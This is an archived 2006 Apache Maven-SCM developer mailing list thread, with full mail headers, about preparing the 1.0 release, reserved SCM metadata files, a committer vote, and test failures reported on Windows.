2006 17:34:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Mar 2006 09:34:54 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 02 Mar 2006 09:34:54 -0800 Received: (qmail 2206 invoked from network); 2 Mar 2006 17:34:40 -0000 Received: from 119.23.99-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 2 Mar 2006 17:34:40 -0000 Message-ID: <[email protected]> Date: Thu, 02 Mar 2006 18:34:26 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: "[email protected]" <[email protected]> Subject: Tests of 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, I finished all changes in maven-scm and it's ready for the release. Can you test it with your respective scm? I updated release plugin, changelog plugin (at mojo.codehaus.org) and continuum 1.0.3 with latest maven-scm artefacts, so if you can test Maven-scm with them, that will be great. I'll release Maven-SCM 1.0 probably at monday if all is ok. snapshot of maven-scm is deployed so you don't need to build it. Thanks. Emmanuel From [email protected] Fri Mar 03 14:02:42 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58953 invoked from network); 3 Mar 2006 14:02:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Mar 2006 14:02:42 -0000 Received: (qmail 33651 invoked by uid 500); 3 Mar 2006 14:03:29 -0000 Delivered-To: [email protected] Received: (qmail 33571 invoked by uid 500); 3 Mar 2006 14:03:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 33558 invoked by uid 99); 3 Mar 2006 14:03:27 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 06:03:27 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 03 Mar 2006 06:03:27 -0800 Received: (qmail 22673 invoked from network); 3 Mar 2006 14:03:10 -0000 Received: from 119.23.99-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 3 Mar 2006 14:03:10 -0000 Message-ID: <[email protected]> Date: Fri, 03 Mar 2006 15:02:57 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: "[email protected]" <[email protected]> Subject: Question about Clearcase, Starteam and Perforce Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, I added a new method in SCMProvider (String getScmSpecificFilename()) This method returns the name of reserved filename/directory use by scm like CVS or .svn Do we have a similar file for Clearcase/Starteam/Perforce ? Emmanuel From [email protected] Fri Mar 03 14:19:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68535 invoked from network); 3 Mar 2006 14:19:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Mar 2006 14:19:53 -0000 Received: (qmail 73630 invoked by uid 500); 3 Mar 2006 14:20:39 -0000 Delivered-To: [email protected] Received: (qmail 73606 invoked by uid 500); 3 Mar 2006 14:20:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 73594 invoked by uid 99); 3 Mar 2006 14:20:38 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 06:20:38 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO conn.mc.mpls.visi.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 06:20:38 -0800 Received: from mahes.visi.com (mahes.visi.com [161.129.204.104]) by conn.mc.mpls.visi.com (Postfix) with ESMTP id A8A86834D for <[email protected]>; Fri, 3 Mar 2006 08:20:16 -0600 (CST) Received: by mahes.visi.com (Postfix, from userid 80) id A0CD7C9CEE; Fri, 3 Mar 2006 08:20:16 -0600 (CST) Received: from 161.129.204.104 ([161.129.204.104]) by my.visi.com (IMP) with HTTP for <[email protected]>; Fri, 3 Mar 2006 08:20:16 -0600 Message-ID: <[email protected]> Date: Fri, 3 Mar 2006 08:20:16 -0600 From: Jeff Jensen <[email protected]> To: "[email protected]" <[email protected]> Subject: Re: Question about Clearcase, Starteam and Perforce References: <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.2.5 X-Originating-IP: 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Perforce does not use local disk for storage of info like CVS and svn. Quoting Emmanuel Venisse <[email protected]>: > Hi, > > I added a new method in SCMProvider (String getScmSpecificFilename()) > This method returns the name of reserved filename/directory use by scm like > CVS or .svn > > Do we have a similar file for Clearcase/Starteam/Perforce ? > > Emmanuel > > From [email protected] Fri Mar 03 14:33:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81203 invoked from network); 3 Mar 2006 14:33:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Mar 2006 14:33:05 -0000 Received: (qmail 90062 invoked by uid 500); 3 Mar 2006 14:33:51 -0000 Delivered-To: [email protected] Received: (qmail 90046 invoked by uid 500); 3 Mar 2006 14:33:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 90035 invoked by uid 99); 3 Mar 2006 14:33:51 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 06:33:51 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webifymail01.webify.local) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 06:33:50 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: Question about Clearcase, Starteam and Perforce Date: Fri, 3 Mar 2006 08:33:40 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Question about Clearcase, Starteam and Perforce Thread-Index: AcY+za/Pwk6NyEXxRlecXWA3ZaEXOwAAaysg From: "Mike Perham" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N And I believe ClearCase is the same. No idea about StarTeam.=20 -----Original Message----- From: Jeff Jensen [mailto:[email protected]]=20 Sent: Friday, March 03, 2006 8:20 AM To: [email protected] Subject: Re: Question about Clearcase, Starteam and Perforce Perforce does not use local disk for storage of info like CVS and svn. Quoting Emmanuel Venisse <[email protected]>: > Hi, > > I added a new method in SCMProvider (String getScmSpecificFilename())=20 > This method returns the name of reserved filename/directory use by scm > like CVS or .svn > > Do we have a similar file for Clearcase/Starteam/Perforce ? > > Emmanuel > > From [email protected] Fri Mar 03 16:00:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31482 invoked from network); 3 Mar 2006 16:00:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Mar 2006 16:00:11 -0000 Received: (qmail 51565 invoked by uid 500); 3 Mar 2006 16:00:57 -0000 Delivered-To: [email protected] Received: (qmail 51544 invoked by uid 500); 3 Mar 2006 16:00:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 51533 invoked by uid 99); 3 Mar 2006 16:00:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 08:00:56 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO xproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 03 Mar 2006 08:00:56 -0800 Received: by xproxy.gmail.com with SMTP id s7so469694wxc for <[email protected]>; Fri, 03 Mar 2006 08:00:35 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=lAR1VFx4Rz9x29l2PWc5hEpCrVQJr2gGXt6/1tqe40Sgjft29gcS6L82MWgPb7FuB5QL/vGJUfxmMJ2HbAqemUywMsZdccajsNIM3kAgedv9HCC+EMRqthr6EvnWWtcTlk+Lz5SDj8QnXw4i15NxE44M+vrxQjcy7ReEtXwIYZE= Received: by 161.129.204.104 with SMTP id k11mr4931707wxa; Fri, 03 Mar 2006 08:00:35 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 3 Mar 2006 08:00:35 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 3 Mar 2006 08:00:35 -0800 From: "dan tran" <[email protected]> To: [email protected] Subject: Re: Question about Clearcase, Starteam and Perforce In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_12976_9438510.1141401635243" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_12976_9438510.1141401635243 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline StartTeam does have it but completely hidden and undocumented. -D On 3/3/06, Mike Perham <[email protected]> wrote: > > And I believe ClearCase is the same. No idea about StarTeam. > > -----Original Message----- > From: Jeff Jensen [mailto:[email protected]] > Sent: Friday, March 03, 2006 8:20 AM > To: [email protected] > Subject: Re: Question about Clearcase, Starteam and Perforce > > Perforce does not use local disk for storage of info like CVS and svn. > > > Quoting Emmanuel Venisse <[email protected]>: > > > Hi, > > > > I added a new method in SCMProvider (String getScmSpecificFilename()) > > This method returns the name of reserved filename/directory use by scm > > > like CVS or .svn > > > > Do we have a similar file for Clearcase/Starteam/Perforce ? > > > > Emmanuel > > > > > > > > > ------=_Part_12976_9438510.1141401635243 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <div>StartTeam does have it but completely hidden and undocumented.</div> <div>&nbsp;</div> <div>-D<br><br>&nbsp;</div> <div><span class=3D"gmail_quote">On 3/3/06, <b class=3D"gmail_sendername">M= ike Perham</b> &lt;<a href=3D"mailto:[email protected]">Mike.= [email protected]</a>&gt; wrote:</span> <blockquote class=3D"gmail_quote" style=3D"PADDING-LEFT: 1ex; MARGIN: 0px 0= px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">And I believe ClearCase is the s= ame.&nbsp;&nbsp;No idea about StarTeam.<br><br>-----Original Message-----<b= r>From: Jeff Jensen [mailto: <a href=3D"mailto:[email protected]">jeffjensen@upstairstec= hnology.com</a>]<br>Sent: Friday, March 03, 2006 8:20 AM<br>To: <a href=3D"= mailto:[email protected]">[email protected]</a><br>Subject: R= e: Question about Clearcase, Starteam and Perforce <br><br>Perforce does not use local disk for storage of info like CVS and s= vn.<br><br><br>Quoting Emmanuel Venisse &lt;<a href=3D"mailto:emmanuel@veni= sse.net">[email protected]</a>&gt;:<br><br>&gt; Hi,<br>&gt;<br>&gt; I ad= ded a new method in SCMProvider (String getScmSpecificFilename()) <br>&gt; This method returns the name of reserved filename/directory use by= scm<br><br>&gt; like CVS or .svn<br>&gt;<br>&gt; Do we have a similar file= for Clearcase/Starteam/Perforce ?<br>&gt;<br>&gt; Emmanuel<br>&gt;<br> &gt;<br><br><br><br><br></blockquote></div><br> ------=_Part_12976_9438510.1141401635243-- From [email protected] Sun Mar 05 03:59:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33874 invoked from network); 5 Mar 2006 03:59:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 03:59:38 -0000 Received: (qmail 10897 invoked by uid 500); 5 Mar 2006 04:00:24 -0000 Delivered-To: [email protected] Received: (qmail 10875 invoked by uid 500); 5 Mar 2006 04:00:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 10861 invoked by uid 99); 5 Mar 2006 04:00:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:00:24 -0800 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=SUBJECT_ENCODED_TWICE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony4.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:00:23 -0800 Received: from 203-217-41-124.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony4.iinet.net.au with ESMTP; 05 Mar 2006 12:00:01 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.02,164,1139155200"; d="scan'208"; a="638581614:sNHT18878536" Message-ID: <[email protected]> Date: Sun, 05 Mar 2006 14:59:55 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: [vote] Add =?ISO-8859-1?Q?Torbj=F8rn_Sm=F8rgrav_as_Mav?= =?ISO-8859-1?Q?en-SCM_committer?= References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N +1. That looks like some great work. - Brett Emmanuel Venisse wrote: > Hi > > I'd want to add Torbjørn Smørgrav as Maven-SCM committer. > He's the maintainer of bazaar scm provider and have done a good work on > it and TCK. > He want to maintain it in next year (at least). > > Here my +1 > > Emmanuel > From [email protected] Sun Mar 05 04:11:32 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35987 invoked from network); 5 Mar 2006 04:11:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 04:11:31 -0000 Received: (qmail 13692 invoked by uid 500); 5 Mar 2006 04:12:18 -0000 Delivered-To: [email protected] Received: (qmail 13676 invoked by uid 500); 5 Mar 2006 04:12:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 13665 invoked by uid 99); 5 Mar 2006 04:12:18 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:12:18 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony4.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:12:15 -0800 Received: from 203-217-41-124.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony4.iinet.net.au with ESMTP; 05 Mar 2006 12:11:54 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.02,164,1139155200"; d="scan'208"; a="638593717:sNHT32549182" Message-ID: <[email protected]> Date: Sun, 05 Mar 2006 15:11:44 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: Tests of 1.0 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Currently, the Bazaar provider tests fail for me under Windows (I have Bazaar installed in Cygwin). IT is only the status command that fails. junit.framework.AssertionFailedError: Check result was successful, output: at junit.framework.Assert.fail(Assert.java:47) at junit.framework.Assert.assertTrue(Assert.java:20) at org.apache.maven.scm.ScmTckTestCase.checkOut(ScmTckTestCase.java:106) at org.apache.maven.scm.ScmTckTestCase.setUp(ScmTckTestCase.java:75) I'd actually like to have the tests not require svn, cvs, bzr installed to pass, and move those tests to integration tests in some way. WDYT? - Brett Emmanuel Venisse wrote: > Hi, > > I finished all changes in maven-scm and it's ready for the release. > > Can you test it with your respective scm? > I updated release plugin, changelog plugin (at mojo.codehaus.org) and > continuum 1.0.3 with latest maven-scm artefacts, so if you can test > Maven-scm with them, that will be great. > > I'll release Maven-SCM 1.0 probably at monday if all is ok. > > snapshot of maven-scm is deployed so you don't need to build it. > > Thanks. > Emmanuel > From [email protected] Sun Mar 05 04:23:45 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37497 invoked from network); 5 Mar 2006 04:23:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 04:23:45 -0000 Received: (qmail 15870 invoked by uid 500); 5 Mar 2006 04:24:32 -0000 Delivered-To: [email protected] Received: (qmail 15862 invoked by uid 500); 5 Mar 2006 04:24:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 15851 invoked by uid 99); 5 Mar 2006 04:24:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:24:31 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony2.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:24:31 -0800 Received: from 203-217-41-124.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony2.iinet.net.au with ESMTP; 05 Mar 2006 12:24:08 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.02,164,1139155200"; d="scan'208"; a="378261991:sNHT18098076" Message-ID: <[email protected]> Date: Sun, 05 Mar 2006 15:24:02 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: [vote] Release Maven-SCM 1.0 final References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I think it's a good idea, or at least mark them deprecated. If this release goes out with them in, you have to keep them working forever :) - Brett Emmanuel Venisse wrote: > I'm not sure. I know all these methods are deprecated since a long time. > You can provide a patch but i don't know if i'll apply it before the > release. > > Emmanuel > >> What about removing all depricated classes and methods before releasing >> version 1.0? >> >> Regards >> Torbjørn >> >> >> >> > From [email protected] Sun Mar 05 04:36:22 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39853 invoked from network); 5 Mar 2006 04:36:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 04:36:22 -0000 Received: (qmail 19530 invoked by uid 500); 5 Mar 2006 04:37:09 -0000 Delivered-To: [email protected] Received: (qmail 19506 invoked by uid 500); 5 Mar 2006 04:37:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 19487 invoked by uid 99); 5 Mar 2006 04:37:08 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:37:08 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony1.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:37:08 -0800 Received: from 203-217-41-124.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony1.iinet.net.au with ESMTP; 05 Mar 2006 12:36:44 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.02,164,1139155200"; d="scan'208"; a="389287036:sNHT20851452" Message-ID: <[email protected]> Date: Sun, 05 Mar 2006 15:36:38 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: Tests of 1.0 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Other test failures: ClearCase checkout: junit.framework.ComparisonFailure: expected:<...c...> but was:<...C...> at junit.framework.Assert.assertEquals(Assert.java:81) at junit.framework.Assert.assertEquals(Assert.java:87) at org.apache.maven.scm.provider.clearcase.command.checkout.ClearCaseCheckOutCommandTest.testCreateViewCommandLine(ClearCaseCheckOutCommandTest.java:38) (looks like a windows drive letter, can usually be gotten around by getting the canonical path of both strings). cvsexe: fails due to the extreme length of the path. Is the extra level for each provider really necessary? maven-scm-providers/maven-scm-providers-cvs/maven-scm-provider-cvsexe could just be maven-scm-providers/maven-scm-provider-cvs-exe StartTeam: org.apache.maven.scm.ScmException: C:\home\brett\scm\maven\scm\maven-scm-providers\maven-scm-provider-starteam\target\testdir\testfile.txt was not contained in c:\home\brett\scm\maven\scm\maven-scm-providers\maven-scm-provider-starteam at org.apache.maven.scm.provider.starteam.StarteamScmProvider.getRelativePath(StarteamScmProvider.java:340) at org.apache.maven.scm.provider.starteam.StarteamScmProviderTest.testGoodGetRelativeFile(StarteamScmProviderTest.java:44) (I don't have starteam installed - do I need to?) Cheers, - Brett Emmanuel Venisse wrote: > Hi, > > I finished all changes in maven-scm and it's ready for the release. > > Can you test it with your respective scm? > I updated release plugin, changelog plugin (at mojo.codehaus.org) and > continuum 1.0.3 with latest maven-scm artefacts, so if you can test > Maven-scm with them, that will be great. > > I'll release Maven-SCM 1.0 probably at monday if all is ok. > > snapshot of maven-scm is deployed so you don't need to build it. > > Thanks. > Emmanuel > From [email protected] Sun Mar 05 04:49:36 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42662 invoked from network); 5 Mar 2006 04:49:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 04:49:36 -0000 Received: (qmail 26051 invoked by uid 500); 5 Mar 2006 04:50:22 -0000 Delivered-To: [email protected] Received: (qmail 26043 invoked by uid 500); 5 Mar 2006 04:50:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 26032 invoked by uid 99); 5 Mar 2006 04:50:22 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:50:22 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony4.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Mar 2006 20:50:22 -0800 Received: from 203-217-41-124.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony4.iinet.net.au with ESMTP; 05 Mar 2006 12:49:00 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.02,164,1139155200"; d="scan'208"; a="638634905:sNHT46165512" Message-ID: <[email protected]> Date: Sun, 05 Mar 2006 15:48:54 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: Tests of 1.0 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Some more feedback. Again, sorry I didn't get this to you earlier. - since Bazaar, VSS, etc are "partially implemented", according to the site, should they be omitted from this release? Or do they do enough to be useful? Can we list what is implemented and what is not? - why is the login package not in the command package? - can the site include a short users guide: how to get a provider instance and call the common methods? This can be very rough and someone else can polish up the text afterwards - I think the examples are important. - there's some javadoc missing. Can this be added to the public facing classes? (eg, ScmFile, ScmResult, and the manager, provider and repository interfaces) - can we get the javadoc and jxr published as part of the release process, like Carlos did for m2? I think these last couple could make a big difference in getting interest in people using it on its own, rather than just those using the maven plugins and continuum. Thanks, Brett Emmanuel Venisse wrote: > Hi, > > I finished all changes in maven-scm and it's ready for the release. > > Can you test it with your respective scm? > I updated release plugin, changelog plugin (at mojo.codehaus.org) and > continuum 1.0.3 with latest maven-scm artefacts, so if you can test > Maven-scm with them, that will be great. > > I'll release Maven-SCM 1.0 probably at monday if all is ok. > > snapshot of maven-scm is deployed so you don't need to build it. > > Thanks. > Emmanuel > From [email protected] Sun Mar 05 16:57:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19765 invoked from network); 5 Mar 2006 16:57:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 16:57:06 -0000 Received: (qmail 73164 invoked by uid 500); 5 Mar 2006 16:57:52 -0000 Delivered-To: [email protected] Received: (qmail 73146 invoked by uid 500); 5 Mar 2006 16:57:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 73135 invoked by uid 99); 5 Mar 2006 16:57:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org 